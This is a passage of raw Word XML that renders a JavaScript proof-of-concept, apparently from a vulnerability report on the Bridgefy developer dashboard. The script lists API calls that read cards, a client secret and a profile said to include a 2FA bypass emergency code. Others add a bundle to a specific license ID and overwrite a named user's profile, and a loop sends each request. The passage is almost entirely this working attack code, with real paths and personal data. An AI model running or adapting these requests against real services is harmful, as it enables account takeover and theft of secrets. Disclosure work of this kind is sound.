          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:br w:type="column"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>xhttp.send(body);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:sectPr>
          <w:type w:val="continuous"/>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:header="0" w:footer="1147" w:top="0" w:bottom="0" w:left="1440" w:right="1080"/>
          <w:cols w:num="2" w:equalWidth="0">
            <w:col w:w="2304" w:space="0"/>
            <w:col w:w="7416"/>
          </w:cols>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="1511" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>'Cards' </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>: [ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>'GET'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>'/bridgefy/dashboard/client/my-cards'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>'' </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>],</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="31"/>
        <w:ind w:left="1511" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>'Client Secret' </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>: [ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>'GET'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>'/bridgefy/dashboard/client/card/client-secret'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>''</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>],</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="31"/>
        <w:ind w:left="1511" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>'User Profile (includes 2FA bypass emergency code)' </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>: [ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>'GET'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>'/bridgefy/dashboard/profile'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>'' </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>],</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="32"/>
        <w:ind w:left="1511" w:right="1544" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>'User</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Licenses'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>'GET'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>'/bridgefy/dashboard/my-licenses'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>''</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>], </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>'Add Bundle to License' </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>: [ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>'POST'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="0"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>'/bridgefy/dashboard/license/6398c89972ee224bd5f0f970/bundle'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-14"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-14"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>'{"bundleId":"com.'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-14"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>+ Math.random() * 100000000000000 + </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>'.com:1"}'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>],</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="0"/>
        <w:ind w:left="720" w:right="2112" w:firstLine="791"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>'Update</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-8"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Profile'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-9"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-8"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-8"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>'PUT'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-8"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>'/bridgefy/dashboard/profile'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>'{"firstName":"Julian Test","lastName":"de la</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="0"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Orta","companyName":"Bridgefy","companyWebsite":"bridgefy.me","country":"60d25aaed1fe3a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>324c1fbf28","role":"Engineering/Product","industry":"Tech","use":"Messaging"}' </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="31"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>var </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>i = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>0;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>for </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>var </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>poc </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>endpoint) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="1511" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>method = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>endpoint[poc][0]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="31"/>
        <w:ind w:left="1511" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>console.log(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>'Trying</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>PoC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>++i</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>for</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>poc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>'"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>=&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-3"/>
